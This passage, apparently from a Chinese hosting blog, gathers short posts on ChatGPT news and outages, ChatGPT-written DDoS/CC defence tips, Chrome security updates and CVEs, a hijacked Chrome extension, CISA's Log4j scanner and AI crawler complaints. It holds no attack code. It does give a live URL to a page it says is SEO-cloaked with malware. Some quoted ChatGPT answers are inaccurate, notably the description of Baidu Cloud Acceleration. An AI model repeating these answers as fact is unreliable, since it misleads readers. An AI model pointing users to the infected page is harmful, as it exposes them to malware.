的搜索功能能够根据网络上的信息提供响应,并且会列出用于生成答案的来源,增强了信息的透明度。 ChatGPT 搜索最初是在去年10月推出,仅限付费用户使用。随后在去年12月,OpenAI 将这一功能推广至所有用户。如今,取消登录限制后,ChatGPT 的搜索服务将直接与 Google 和 Bing 等传统搜索引擎展开竞争,用户不再需要创建账号即可体验这一便捷服务。 为了提高用户体验,最近的更新使得 ChatGPT 的搜索界面看起来更像传统搜索引擎,用户可以查看地图、图片以及当地景点的简要描述。这种视觉上的改进使得搜索结果更加直观,用户能够更快找到所需信息。此外,类似于 Perplexity 这样的 AI 回答引擎也允许用户无需登录就可以进行网络搜索,并且已经推出了与 TripAdvisor 直接整合的功能,方便用户获取酒店信息和评价。 OpenAI 在不断优化 ChatGPT 的搜索体验,致力于使其成为用户获取信息的首选工具。这一决定不仅降低了用户使用的门槛,也意味着 AI 技术在搜索领域的应用将更加普及。用户们现在可以更轻松地利用这一工具,随时获取他们需要的答案,而不必担心登录的问题。 #### ChatGPT.cn被昆仑万维以50W购买并用于“天工”官网 最近股市大牛股昆仑万维花了50万专门买了ChatGPT.cn域名,并把这个域名用来转发他新出的 “天工”产品。 天工是昆仑万维新出的类ChatGPT竞品,昆仑万维这种算是碰瓷了ChatGPT了,如果ChatGPT公司有在国内申请商标的话,稍微运作一下,估计很容易拿到ChatGPT.cn所有权,不过昆仑万维好像跟ChatGPT公司合作关系,碰瓷一下好像也没什么问题,问题是以后ChatGPT公司要不要进军内地呢?如果进军内地的话,这个域名就得收回来了。 #### chatgpt:如何运营抖音号 1.确定抖音号的定位和目标受众:首先,要明确抖音号的定位和目标受众,以便制定合理的运营策略。 2.制定运营策略:其次,制定针对性的运营策略,包括内容策略、宣传策略、互动策略等,以最大程度满足用户需求。 3.实施细节:最后,制定具体的实施流程,包括内容制作、发布时间、宣传渠道等,以及及时调整策略,持续改善抖音号的运营效果。 #### ChatGPT不仅限制了中国大陆,连香港也限制访问 今年科技圈大火的ChatGPT先是2月份禁止国内注册后,4月份连香港也被限制使用ChatGPT,原因是什么其实大家都懂,就是为了限制中国人使用ChatGPT。 ChatGPT式的生成式人工智能大模型,未来在很长一段时间都会是中美两国科技竞争的领域。 其实目前国内的生成式AI模型并不比ChatGPT差多少,以百度“文心一言”和讯飞“火星大模型”为例,每个月都会更新,能力也在不断变强,基础上达到ChatGPT3.5刚发布时的水平了。 主机吧用了两个月,基本上很少用搜索引擎了,这是一个对站长来说非常不利的情况。 这种工具对一些用户来说,依赖非常严重,一但用上了,基本上回不去了,因为实在太方便了。 #### ChatGPT写的什么是DDOS 如何防御 DDOS (分布式拒绝服务攻击) 是一种将大量请求发送到目标服务器的无意义,无关的请求的攻击, 把服务器资源耗尽,让服务器无法响应正常请求,造成中断服务的攻击。防御DDOS 攻击的主要措施有:1. 使用防火墙、入侵预防系统和反向代理解决方案,用于检测和阻止不正常的网络流量。2. 通过减少对网络设备的公开暴露,减少外部缓慢攻击所确定的攻击目标数量。3. 引入预防 限制和限制网络上每个系统和帐户的行为的措施。4. 增加带宽,以便容纳更多的请求,但是这种方法往往代价非常昂贵。5. 尽可能的缩小被攻击的服务器的攻击面积,避免攻击是整个网络的情况,减少攻击的受害者。6. 使用负载均衡技术分散流量,减少峰值的压力。7. 尽可能地提高现有的安全策略,以能恰当地拒绝不必要的请求。8. 记录服务器访问日志,做好足够的监测和安全审计。 #### ChatGPT写的什么是百度云加速 百度云加速是百度搜索引擎对用户网站进行动态缓存和搜索结果排序算法优化,以提高百度搜索引擎对用户站点访问速度和排名的功能。百度云加速提供了针对性的建议和工具,使网站的页面加载速度更快,其用户体验也更好。百度云加速技术是通过优化网站的< html >和< JavaScript >代码,来缩短内容的访问延迟,帮助网站快速加载以获取更佳的搜索引擎排名。 #### chatgpt同类产品:讯飞星火大模型 讯飞星火大模型是讯飞开发的一种基于深度学习和自然语言处理技术的人工智能语言模型。 发布于2023年5月6日,是主机吧常用的类chatgpt服务之一,其生成速度比chatgpt要快,而且主机吧感觉星火大模型是国内众多生成式AI产品中,跟chatgpt差距最小的。 讯飞星火大模型也是国内众多产品中明确时间表追上chatgpt的产品,说明讯飞对自己实力很有信息。 官方地址:https://xinghuo.xfyun.cn/ #### ChatGPT和API发生重大事故,中断2小时 11月9日凌晨,OpenAI在官网发布,ChatGPT和API发生重大中断,导致全球所有用户无法正常使用,宕机时间超过2小时。 目前,OpenAI已经找到问题所在并进行了修复,但仍然不稳定,会继续进行安全监控。 OpenAI暂时没有公布具体的错误原因,但外界猜测,这与其最新发布的GPT-4Turbo模型有关,大量用户和开发者的涌入对服务器造成巨大负担。 因为在过去很长一段时间,ChatGPT和API没有发生过重大事故。 OpenAI在官网发布的公告 中断事件经过 1)第一次中断 最初在太平洋时间11月7日晚上8点左右(大约北京时间8日中午12点),有用户陆续向OpenAI报告ChatGPT和API出现定期中断的问题。 20点30分,OpenAI对该问题进行了修复,但仍在调查中;20点47分,彻底恢复正常,继续安全监控。 21点,ChatGPT和API再次出现降级、中断;22点,OpenAI已经修复;22点20分,彻底解决。 2)第二次重大中断 太平洋时间11月8日上午5点40开始(约北京时间8日晚上9点40左右),ChatGPT和API再次出现故障并且比上一次严重,影响所有用户。 上午6点,OpenAI开始调查,发现API 和 ChatGPT 的错误率很高;6点50,找出错误问题所在并开始修复;7点33,开始陆续恢复服务,并继续监控。 从上述经过不难看出,OpenAI对整个宕机事件的处理是挺及时的,不过在24小时之内就连续出现两次宕机,并且一次是非常严重。想必未来,OpenAI会对其模型、服务器进行一次优化吧。 过往ChatGPT、API宕机历史 根据OpenAI在官网公布的事故历史来看,ChatGPT和API的运行并非一帆风顺曾出现过几次重大的错误,宕机时间比这次还严重。 1)ChatGPT重大事故历史 2023年2月21日,宕机4小时; 2月27日,3小时; 3月20日,4小时; 5月24日——25日,2小时; 7月11日,2个半小时; 8月31日,3小时。 2)API重大事故历史 2023年1月7日, API宕机7小时; 1月25日,4小时; 2月21日,3小时; 3月2日,3小时; 8月9日,5小时; 9月15日,3小时; 10月19日,3个半小时。 #### chatGPT在国内彻底被墙了 虽然chatGPT不让国内网络使用,但是方法总比困难多。主机吧也用着国内的网络使用了chatGPT很长一段时间,结果今天在使用的时候发现访问不了! 于是简单ping了下,发现真的被墙了。 墙的方式跟谷歌一个套路,DNS污染。 虽然早有预感这东西会被墙,没想到墙得这么快,这确实是一个好工具,但用这个工具的人也不一定全部都是好人,只是可惜了,国内百度据说本月要出类似的工具,但是估计没人家强大,毕竟数据摆在那,人家专们做了7年,7年前百度还在躺赚竞价广告的钱呢,哪有心思搞这个。 #### chatgpt大火,相关域名价值暴涨,chat.com卖了1250万美元 今年是chatgpt科技元年,chatgpt大火的同时,相关域名价值也暴涨,比如chat.com,买家两个月前1000万美金购买,然后1250万美金刚刚出售了它,获利250万美金。 这还只是个别案例,主机吧查了下,有价值的chatgpt域名均被注册完了。 米农是最懂商机的。 #### ChatGpt怎么回答:百度云加速如何防御CC攻击的 百度云加速是一种云计算服务,它提供了一系列的安全措施来保护其用户免受CC攻击的影响。以下是一些可能采用的防御措施: 基于IP的访问限制。通过限制来自同一IP地址的请求,以避免恶意用户发起CC攻击。可以根据需要调整访问限制的级别和时长。 基于用户行为的限制。通过监视用户的行为并分析其请求,可以检测到异常或不规则的行为,例如高频率或重复请求。一旦检测到这种行为,可以对用户进行限制或暂停访问。 负载均衡和流量过滤。通过负载均衡将流量分配到多个服务器上,同时通过流量过滤检测和清除恶意流量,从而分散CC攻击的影响并保护服务器免受攻击。 网络安全服务。百度云加速提供了一系列的网络安全服务,例如DDoS攻击防护、网站安全防护等,这些服务可以帮助用户及时检测和应对恶意攻击。 安全加固和漏洞修复。百度云加速提供了一些安全加固和漏洞修复的工具,可以帮助用户及时发现和修复可能导致CC攻击的安全漏洞。 总之,百度云加速采用多种技术手段来防御CC攻击,保障用户的服务可用性和安全性。 #### ChatGPT被 DDoS 攻击了,中断了几个小时 11 月 9 日消息,北京时间 11 月 8 日晚间,人工智能公司 OpenAI 旗下聊天机器人服务 ChatGPT 突现重大故障,导致该应用无法使用。 美国东部时间 11 月 8 日上午 9 点左右,ChatGPT 及其 API 突然中断服务,用户被告知“ChatGPT 目前负荷已满”,状态页面将该问题称为“严重中断”。随后,OpenAI 确认已实施修复措施,服务开始逐渐恢复。 OpenAI 在最新的系统更新中表示:“我们正在处理由于 DDoS 攻击出现的异常流量模式导致的周期性中断。我们正在继续努力缓解这一问题。” OpenAI CEO 山姆・奥特曼也公开发文致歉,称由于本周新发布的功能使用量远超预期,导致负载过重,从而出现服务不稳定的情况。 这次攻击发生在 OpenAI 于周二举行其首届开发者大会 DevDay 之后,在大会上该公司发布了一款新的 AI 产品 GPTs,允许开发者和公司定制 ChatGPT,以满足他们的特定需求和服务。该公司还布了其 GPT-4 Turbo 模型的预览,拥有 128k 的上下文窗口,OpenAI 表示,这将使其能够接受相当于 300 页的单个文本提示。还将比当前的 GPT-4 聊天机器人速度更快,同时运行成本降低到了一半。 目前,ChatGPT 的周活用户数已超过 1 亿。OpenAI 称,已有超过 92% 的财富 500 强企业在使用其平台,高于 8 月份的 80%,范围涵盖金融服务、法律应用和教育等行业。 #### ChatGPT:网站如何提高百度排名 为了提高网站在百度搜索中的排名,你可以尝试以下几种方法: 1.建立良好的网站结构; 2.提供有价值的内容; 3.更新网站内容; 4.优化网站内部链接; 5.使用百度站长平台; 6.增加网站外部链接; 7.利用社交媒体推广网站; 8.建立网站的移动版本; 9.提交网站的 sitemap.xml; 10.执行关键字优化等等。 #### Chrome 68不止标记出不安全的 HTTP 网站,Chrome浏览器新功能介绍 作为世界上最受欢迎的浏览器,7 月 24 日,Chrome 的版本号已经不知不觉更新到了 68。在安全方面,这一版 Chrome 也再创里程碑,它居然能直接标记出不安全的 HTTP 网站了。当然,这是今年 5 月谷歌早就透露的新版 Chrome 的重要功能。当时,它还宣布,从 Chrome 69 开始(今年 9 月发布),如果网页缺乏安全防护,HTTP/HTTPS 页面上就只会显示“不安全”的标记了,而 HTTPS 网页上的“安全”标记则会被移除。Chrome 浏览器已经堪比小型杀毒软件Chrome 这一变可不要紧,许多网站的所有者可遭殃了,一旦被印上“不安全”的标记,恐怕他们得赔了夫人又折兵。据 Cloudflare 推测,全世界流量排在前 100 万名得网站中,有 542605 个都不使用或将用户重新定向到 HTTPS 版本,这也就意味着,用户使用 Chrome 68 访问网页时,大概率会见到“不安全”的标记。除了这个“不安全”标记,雷锋网(公众号:雷锋网)了解到,Chrome 68 还带来了不少炫酷的安全新功能。Chrome 68 带来两大反恶意广告功能在安全上,恐怕最亮眼的就是 Chrome 的全新恶意广告防御机制。比如,Chrome 现在能拦截臭名昭著的 iframes(通常会嵌入在网页中)了,此前这种将上层页面重新定向到另一个 URL 的操作让用户深恶痛绝。其实谷歌从 Chrome 64 就开始逐渐应用这种机制了,不过在 Chrome 68 中才算全面上线。当然,iframe 并没有被 Chrome 一巴掌拍死,如果用户愿意和它互动,它也可以对页面进行重新定向。不过整体来说,这一改变确实对拦截恶意广告起了巨大作用。其次,Chrome 68 添加了全面的 tab-under 行为拦截功能。所谓的“ tab-under” 其实就是当用户点击一个链接,网站会在另一个标签页打开新的 URL,而老的标签页不但不关闭,还成了各种广告的集散地。最近几年来,tab-under 技术在互联网上泛滥成灾并成为一颗毒瘤。去年谷歌首次公布了 tab-under 拦截功能,第一个拦截机制也随 Chrome 65 一同诞生。现在,随 Chrome 68 一同面世的则是正式版的拦截功能,浏览器每次进行拦截,都会在网页上警告用户。Chrome 与 tab-under 行为的斗争在另一个安全领域,Chrome 68 也实现了新的里程碑。一直以来,谷歌都试图阻止第三方软件(大多数为杀毒软件)在 Chrome 主进程中植入代码,而现在这项工作进入第二阶段了。去年 11 月份谷歌曾解释称,Chrome 68 会开始拦截第三方软件在 Chrome 主进程中植入代码,如果拦截会造成 Chrome 无法启动,浏览器会重启并允许第三方软件启动,但还是会显示警告以指导用户移除该第三方软件。雷锋网了解到,明年 1 月份,谷歌更是会下狠手,彻底移除在 Chrome 中植入第三方代码的功能,并对这种行为进行彻底的封杀。API 和网页开发端也有大变化不过,新的 Chrome 68 可不是简单的修修补补并添加些安全功能的挤牙膏产品,新版浏览器的 API 和网络标准支持的升级工作也在稳步推进。Chrome 68 最有趣的新增功能恐怕就是支持 Payment Handler API 了。这个新的 API 其实就是 Chrome 61 中出现的 Payment Request API 的小伙伴,有了它整个在线支付的过程会简化很多。除此之外,谷歌还听取了开发者社群的反馈,专门修改了“添加到主屏幕”(Add to Home Screen)功能,将弹出功能的控制权下放给开发者。当然,Chrome 68 中还新增了 Page Lifecycle API,未来该 API 将成为大多数网页开发者的必备功能之一。有了 Page Lifecycle API,开发者就能根据用户设备的“生命周期”(CPU、电池、浏览器标签页、前台/后台状态等都会开率在内)对网站进行微调,以提升用户体验。 #### Chrome 70更新 向所有HTTP网站标注红色“不安全” 10月23日 消息:近日,Chrome70 稳定版正式发布,支持在Windows10 平台上安装Progressive Web Apps(PWA)。 作为首次采取安全套件TLS1. 3 正式版的Chrome版本,在安全与功能方面,Chrome70 进一步做了提升!网站HTTP页面“不安全”显示标识,即当用户输入网址时,凡是HTTP普通协议站点将显示一个红色的“Not Secure”(不安全)警告。 此次更新是谷歌强制要求“HTTPS安全协议 100%”计划的一部分,其目标是要求所有网站都通过HTTPS协议加载到Chrome上,从而强调HTTP网站不应被信任。 其实,Google很早就已经开始进行大力推广,但当时响应支持的并不是很多。这主要是因为迁移至HTTPS比较困难存在一定的技术门槛,而且成本也比较高昂;其次就是当时没有任何行业在推动这项变革。 数据显示,安卓上的Chrome加密流量从42%增长到76%;Chrome OS上Chrome加密流量从67%增长到85%;Top100 的网站中默认使用HTTPS的站点从 37 个增长到 83 个。 Google 对于网站应为HTTPS 一直以来不断推广,相关的执行时程表及政策如下: 经过了数年的推广,Google通过在Chrome浏览器中标记这些网站为不安全链接,从而引起用户和站长的注意。在Google的努力下,目前Chrome上68%的流量都是得到保护的,自Top100 网站中已经有 81 家网站默认使用HTTPS。 #### Chrome 浏览器遭遇 CVE-2024-7965漏洞 可远程攻击,从而造成堆内存损坏 近期,Chrome浏览器被发现存在一个严重的安全漏洞,编号为CVE-2024-7965。该漏洞可能被攻击者利用,进行远程攻击,并导致堆内存损坏。这一漏洞的曝光引发了网络安全专家的高度关注,用户需尽快采取措施以保护自己的设备和数据安全。 一、漏洞概述 CVE-2024-7965是一个影响Chrome浏览器的堆内存损坏漏洞。攻击者可以通过特制的网页或恶意链接,诱骗用户访问,从而触发该漏洞。一旦成功利用,攻击者能够执行任意代码,可能导致系统崩溃、数据泄露甚至完全控制受影响设备。 二、攻击方式 攻击者可以通过以下方式利用CVE-2024-7965漏洞: 恶意网页:攻击者创建一个含有恶意代码的网站,用户只需访问该网站便可能触发漏洞。 钓鱼邮件:通过发送包含恶意链接的钓鱼邮件,诱骗用户点击,从而访问恶意网页。 广告网络:利用广告网络传播恶意代码,当用户浏览网页时,自动加载恶意内容。 三、潜在影响 CVE-2024-7965漏洞的潜在影响包括但不限于: 数据泄露:攻击者可以访问用户的敏感信息,包括密码、银行账户等。 系统崩溃:利用该漏洞可能导致浏览器崩溃,影响用户正常使用。 恶意软件植入:攻击者可以利用该漏洞在用户设备上植入恶意软件,进一步进行恶意活动。 四、应对措施 为了防止CVE-2024-7965漏洞带来的威胁,用户可以采取以下措施: 及时更新Chrome浏览器:确保使用最新版本的Chrome浏览器,Google会定期发布安全更新以修复已知漏洞。 安装安全软件:使用可靠的防病毒软件,实时监控并拦截潜在的恶意活动。 提高警惕:避免点击不明链接,尤其是在电子邮件和社交媒体上的可疑内容。 使用安全浏览模式:启用Chrome的安全浏览模式,增强对恶意网站的保护。 这个漏洞是在2024年7月30日被一位名叫 TheDog 的安全研究员发现并报告的,因此他获得了11000美元的漏洞奖励。不过,关于利用这一漏洞的具体攻击方式或相关攻击者的信息,谷歌尚未披露。 谷歌表示,他们已经意识到 CVE-2024-7965的存在,并确认其在发布更新后就被发现正在被利用。但目前尚不清楚这个漏洞在披露之前是否已经被黑客当作零日漏洞进行攻击。为了确保安全,谷歌强烈建议用户尽快将 Chrome 浏览器更新到版本128.0.6613.84或128.0.6613.85(Windows 和 macOS)以及128.0.6613.84(Linux)。 在2024年,谷歌已经处理了多达九个零日漏洞,其中包括在 Pwn2Own2024大赛上展示的三个漏洞。这些漏洞涵盖了多个方面,如 V8引擎的越界内存访问、WebCodecs 的使用后释放等。 #### Chrome已部署Windows 10的安全漏洞缓解措施 在 Windows 10 计算机上,微软部署了名为 CET 的控制流缓解措施,以实现硬件增强的堆栈保护。现在,Google Chrome 浏览器也借鉴了这一方案,为所有兼容设备引入了增强型的漏洞利用防护特性。据悉,这项措施能够阻止攻击者在 Windows 10 2004 及以上版本的英特尔 11 代 / AMD Zen 3 处理器上利用相关安全漏洞。 (来自:Tech Community) 硬件强制堆栈保护功能,借助了 Intel CET 芯片组安全性扩展,来保护应用程序免受常见漏洞利用技术的侵害,比如面向返回的编程(ROP)或面向跳转的编程(JOP)。 攻击者经常利用此类技术,来劫持特定程序的预期控制流以执行恶意代码,最终目的是在访问恶意之作的网页时,从浏览器的沙箱中逃逸、或远程执行代码。 (图自:Microsoft) 庆幸的是,Windows 10 的硬件强制堆栈保护功能,可在检测到应用程序的自然流程被修改时触发异常检测,以阻止上述类型的攻击。 Chrome 平台安全团队工程师 Alex Gough 表示:通过部署这种缓解措施,处理器将维护一个新的受保护的有效返回地址堆栈(又名“影子堆栈”)。 在提升漏洞编程难度的同时,系统的安全性也得到了更好的保障。但若将自身加载到 Chrome 中的软件与缓解措施不兼容,又可能影响整体的稳定性。 启用硬件强制堆栈保护后的 Chrome 进程 (图自:Google) Bleeping Computer 指出,谷歌并不是首个在 Chromium 中引入硬件强制堆栈保护功能的浏览器开发商。 因为 Microsoft Edge 漏洞研究负责人 Johnathan Norman 曾表示,早在 Edge 90(Canary 通道)上,他们就已经在非渲染器进程中增加了对 Intel CET 功能的支持。 至于 Mozilla,虽然它也希望在 Firefox 浏览器中纳入对 Intel CET 的支持,但过去一年还是没有多大进展。不过在谷歌和微软的带头下,想必我们也无需等待太久。 任务管理器截图 最后,在兼容 CPU (英特尔 11 代 / AMD Zen 3 处理器)平台上运行浏览器软件的 Windows 10 用户,现已能够通过 Windows 任务管理器,来检查浏览器进程是否已经启用了硬件强制堆栈防护功能。 方法是打开“任务管理器”,转到“详情”选项卡,邮件点击标题和“选择列”,然后检查“硬件强制堆栈保护”前的 √ 有没有被打上。 #### Chrome扩展被攻击 多家公司对用户投毒 连网安公司攻击也中招 12月29日消息,据媒体报道,近日,多家公司的Chrome浏览器扩展功能遭到黑客攻击,导致用户敏感数据面临泄露风险。 其中,美国加州的数据安全初创公司Cyberhaven成为受害者之一,该公司已对外证实遭受恶意网络攻击。 据安全研究员Matt Johansen获取的Cyberhaven发给用户的邮件显示,黑客在12月25日凌晨入侵公司账户,并发布了Chrome扩展功能的恶意更新。 这可能导致用户的敏感数据,包括经过身份验证的会话和Cookie外泄,Cyberhaven建议受影响用户撤销扩展权限并更换所有密码。 Cyberhaven检测到漏洞后立即将恶意更新的扩展(24.10.4版本)从Chrome在线应用商店下架,并推出了新的24.10.5版本,目前Cyberhaven的扩展功能已在商店中无法找到。 Cyberhaven发言人Cameron Coles拒绝对邮件内容发表评论,但未否认邮件细节,并强调公司正在积极与美国联邦执法部门合作调查此事件。 Cyberhaven的产品声称可以防止数据泄露和网络攻击,客户包括摩托罗拉、Reddit、Snowflake等知名公司。 据Chrome在线应用商店记录显示,Cyberhaven的扩展功能拥有约40万名用户。 网络安全公司Nudge Security的联合创始人兼技术长Jaime Blasco表示,其他几个Chrome扩展功能也成为相同攻击的目标,包括几个拥有数万名用户的扩展。 #### Chrome正在启用HTTP/3,支持IETF QUIC Chromium 官方宣布 Chrome 正在部署到 HTTP/3 与 IETF QUIC。 QUIC(Quick UDP Internet Connections)是 Google 推出的一个项目,旨在降低基于 TCP 通讯的 Web 延迟。QUIC 非常类似 TCP+TLS+SPDY ,但是基于 UDP 实现的。它是 HTTP/3 的基础协议。 2015 年,Google 将 QUIC 引入负责维护互联网协议的标准组织 IETF,并且 IETF 一直在对 QUIC 进行改进,目前有两个相似但不同的 QUIC 协议:Google QUIC 与 IETF QUIC。 Chrome 中使用的是 Google QUIC,同步地 Google 也在参与 IETF 对 QUIC 的改进,发展到现在最新的 Google QUIC 版本 Q050 与 IETF QUIC 有许多相似之处,不过大多数 Chrome 用户通常无法与 IETF QUIC 服务器进行通信。 Chromium 团队表示,其发现 IETF QUIC 的性能优势特别高,使得 Google 搜索延迟减少了 2% 以上,YouTube 的重新缓冲时间减少了 9% 以上,PC 客户端吞吐量增加了 3% 以上,移动设备的客户端吞吐量增加了 7% 以上,因此宣布 Chrome 即将引入对 IETF QUIC h3-29 版本的支持。 目前有 25% 的 Chrome 稳定用户正在使用 IETF QUIC h3-29,Chrome 计划在接下来的几周内扩大这一占比并继续监控性能数据。“Chrome 会积极支持 IETF QUIC h3-29 和 Google QUIC Q050,以便为支持 Q050 的服务器提供时间更新为 IETF QUIC。”这也就意味着,后续 Chrome 将全面从 Google QUIC 迁移到 IETF QUIC。Chroimum 还表示,当下 Chrome m85 尚不支持 IETF QUIC 0-RTT,接下来几个月中团队为 IETF QUIC 推出 0-RTT 支持后,预计性能数据将会更好。 主机吧认为一但HTTP普及对于建站工作者来说是非常利好的消息的。 #### Chrome浏览器将不让HTTPS网站通过HTTP下载文件 你是否经历过访问的明明是一个 HTTPS 网站,但是有时候站内下载东西使用的协议却是 HTTP,这其实存在安全隐患,现在 Chrome 不想让这样的事情发生。 ZDNet 报导,谷歌 Chrome 工程师正计划在 HTTPS 网站上默认禁止一些通过 HTTP 下载的行为,当涉及到下载 EXE、DMG(Mac 应用二进制文件)、CRX(Chrome 扩展包) 与诸如 ZIP、GZIP、BZIP、TAR、RAR 和 7Z 等主流压缩/打包文件时,浏览器将阻止下载。 默认阻止下载的这些文件类型被认为是“高风险”的,因为它们最有可能被滥用来隐藏恶意程序。 该想法由谷歌工程师 Emily Stark 在 W3C 邮件列表上提出。 Emily 表示目前仅考虑阻止在 HTTPS 站点上发起的下载行为,而如果是 HTTP 网站下载这些类型文件,则不加以阻止,因为浏览器本身已经通过 URL 栏对于 HTTP 网站给出了“不安全”的提示。 此外,目前仅考虑将此功能添加到桌面版 Chrome 中,Emily 认为在 Android 上,Chrome 已经可以以类似的方式阻止可疑的 APK 文件,所以暂时问题不大。 在邮件中,Emily 还表示希望其它浏览器制造商实施类似的机制,随后 Mozilla 发言人回应称:“我们有兴趣与谷歌等方面进一步探讨这些想法。” #### Chrome浏览器将自动阻止https页面加载http资源 Chrome安全小组近日在一篇博客文章中表示,计划使https://页面不再加载HTTP子资源。 根据Google的说法,Chrome用户现在在所有主要平台上的HTTPS 上花费了90%以上的浏览时间。但是,那些安全页面加载不安全的HTTP子资源却是很常见的。这些子资源中的许多默认情况下都是被阻止的,但有些会作为图像、音频和视频或“混合内容”潜入,混合内容可能会使用户面临风险,比如脚本、iframe与媒体文件。 从今年12月开始测试的 Chrome 79开始,Chrome将会逐步阻止所有混合内容。到2020年1月,Chrome 80会将所有混合音频和视频资源自动升级为HTTPS,如果无法通过HTTPS加载,则将自动被阻止。最终,在2020年2月,Chrome 81将所有混合图像、音频与视频自动升级为HTTPS,并且阻止那些无法通过HTTPS加载的图像。 同时,Chrome 79中还将添加一个新设置项,用户可以用来取消阻止特定站点上的混合内容。 这样的过渡使开发人员有时间将其混合内容迁移到HTTPS上。 类似的措施,此前我们报导过,谷歌Chrome工程师Emily Stark已经在 W3C邮件列表上提出,计划在HTTPS网站上默认禁止一些通过HTTP下载的行为,当涉及到下载EXE、DMG、CRX(Chrome扩展包)与诸如ZIP、GZIP、BZIP、TAR、RAR和 7Z等主流压缩/打包文件时,浏览器将阻止下载。默认阻止下载的这些文件类型被认为是“高风险”的,因为它们最有可能被滥用来隐藏恶意程序。 #### Chrome浏览器模拟百度蜘蛛访问 解决网站隐藏被黑 某些网站可能针对搜索引擎挂马(百度/360/搜狗等),Chrome浏览器可以安装User-Agent Switcher for Chrome模拟百度蜘蛛来访问网页,如果是针对搜索引擎挂马的就会显示。 准备工作 已经安装Google Chrome浏览器 安装扩展 访问 User-AgentSwitcher_1_0_43.crx 并下载这个扩展 按照下图打开Chrome浏览器 - 扩展程序 设置百度蜘蛛 安装完成在扩展程序页面可以看到User-Agent Switcher for Chrome点选项 按照如下截图添加百度蜘蛛(蓝色的文字部分) New User-agent name:baidu New User-Agent String:Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html;soso;360;sogou) Group:spider Append?:Repalce Indicator Flag:1 测试 安装扩展后Chrome浏览器右上角多出一个小眼睛,点击小眼睛 - spider - baidu,这样就可以模拟百度蜘蛛访问了。 比如访问一个针对搜索引擎挂马的网页:http://www.zttoten.com/index.php?rmlbgh=cbfmcm&westauditpageinfo=1 [这个地址可能会会失效],这样就可以看到被挂马的情况。(默认情况下访问这个地址可能会跳转到网站首页。) 注意事项 如果之前已经用正常模式访问过非法信息网页,再模拟百度蜘蛛的时候可能会失效,清除下浏览器缓存(cookie),然后重新选择百度蜘蛛访问非法信息页面测试。 此方法仅针对搜索引擎挂马有效,其它挂马类型并不适用。 #### Chrome浏览器现高危漏洞 近日,谷歌官方发布了Chrome浏览器的风险通告,公布了新的高危漏洞,该漏洞编号为CVE-2022-3075,漏洞评分7.4,且已经被发现存在利用情况。 和此前的高危漏洞情况类似,为了避免影响范围进一步扩大,谷歌暂未公布该漏洞的剧情信息,仅表示该漏洞与Chromium构架运行库集合Mojo的数据验证不足”有关。 据悉,Mojo是运行时库的集合,提供了与平台无关的通用IPC原语抽象、消息IDL格式和绑定库,可以为多种目标语言生成代码,以促进跨任意进程间和进程内边界的便捷消息传递。 因此,攻击者可通过多种方式诱导用户访问恶意的链接来利用此漏洞,成功利用此漏洞的远程攻击者可绕过安全限制,在服务器上执行任意代码。 简单来说,该漏洞对于攻击者来说有较高的利用价值,并且影响范围较大,可能会对用户的信息安全造成影响。 在Chrome浏览器最新的105.0.5195.102版本中,谷歌已经修复了该漏洞,为了确保信息安全,最好尽快更新该版本。 需要注意的是,诸如Edge等使用Chromium内核的浏览器也会受到该漏洞影响,用户最好也尽快升级新版本。 #### CISA发布Apache Log4j漏洞扫描器 可筛查易受攻击的应用实例 在 Log4shell 漏洞曝光之后,美国网络安全与基础设施局(CISA)一直在密切关注事态发展。除了敦促联邦机构在圣诞假期之前完成修补,国防部下属的该机构还发起了 #HackDHS 漏洞赏金计划。最新消息是,CISA 又推出了一款名叫“log4j-scanner”的漏洞扫描器,以帮助各机构筛查易受攻击的 web 服务。 截图(来自:GitHub) 据悉,作为 CISA 快速行动小组与开源社区团队的一个衍生项目,log4j-scanner 能够对易受两个 Apache 远程代码执行漏洞影响的 Web 服务进行识别(分别是 CVE-2021-44228 和 CVE-2021-45046)。 这套扫描解决方案建立在类似的工具之上,包括由网络安全公司 FullHunt 开发的针对 CVE-2021-44228 漏洞的自动扫描框架。 有需要的安全团队,可借助该工具对网络主机进行扫描,以查找 Log4j RCE 暴露和让 Web 应用程序绕过防火墙(WAF)的潜在威胁。 CISA 在 log4j-scanner 项目主页上介绍了如下功能: ● 支持统一资源定位符(URL)列表。 ● 可对 60 多个 HTTP 请求标头展开模糊测试(不仅限于 3-4 个)。 ● 可对 HTTP POST 数据参数开展模糊测试。 ● 可对 JSON 数据参数开展模糊测试。 ● 支持用于漏洞发现和验证的 DNS 回调。 ● 可筛查有效载荷的防火墙(WAF)绕过。 #### Claude AI网络爬虫大量抓取某公司网站惹众怒 最近,主机邦一直在说拦截恶意爬虫的事情,最近有一家AI公司,就因为大量爬取别人网站而惹众怒。 起因是Claude的AI爬虫不仅无视网站的禁止抓取协议,而且还大量爬虫该网站上百万次,导致该网站直接瘫痪了。这家“受害者”公司其实有尽力防御了,但阻止失败,内容数据还是被Claude强行抓取了。 因此,该网站负责为此还怒喷Claude。 被抓取的这家公司叫做iFixit,是一家美国电子商务和操作指南网站。iFixit的业务的一部分,是为消费电子产品和小工具提供类维基百科的免费在线维修指南。网站内有数百万个页面,包括修理指南、指南的修订历史、博客、新闻帖子和研究、论坛、社区贡献的修理指南和问答部分等。但,iFixit突然发现,Claude的爬虫程序ClaudeBot在几个小时内,每分钟都有数千次请求访问。这约等于一天内访问其网站近百万次。据统计,它一天内访问了10 TB的文件,整个5月份总计访问了73 TB。 其实国内也有类似的情况,很多网站内容在不知情的情况下被大量抓取内容用来训练AI,这已经是司空见惯了,但这些AI每次进来的时候,总会影响服务器,导致服务器因为这些AI爬虫而CPU爆满,影响访问。 为此,主机磅推荐使用WEB应用防火墙进行拦截处理,比如百度云防护不仅支持自定义UA拦截,还支持bot防护功能,可有效阻止AI机器人恶意抓取网站内容。 #### Cloudflare 2025雷达报告:AI爬虫暴增15倍,DDoS攻击破30Tbps,互联网“风暴”强度再升级 报告概览:一幅由海量流量绘制的互联网“气象图” Cloudflare近日连续第六年发布其权威的《雷达年度回顾报告》。这份基于其全球网络庞大数据绘制的“互联网气象图”,系统揭示了2025年塑造网络格局的三大核心驱动力:人工智能的自动化洪流、持续升级的安全威胁,以及加密与连接技术的静默革命。 报告指出,2025年全球互联网流量同比增长19%,且下半年增速显著加快。在整体繁荣的表象之下,流量的结构与性质正在发生深刻且充满挑战的剧变。 趋势一:流量激增与结构性转变 稳定巨头与AI新贵:通过1.1.1.1 DNS解析数据可见,传统互联网服务格局保持稳定(Google、Facebook领跑),但生成式AI服务已成为不可忽视的流量力量。ChatGPT虽居首位,但Perplexity、Claude、GitHub 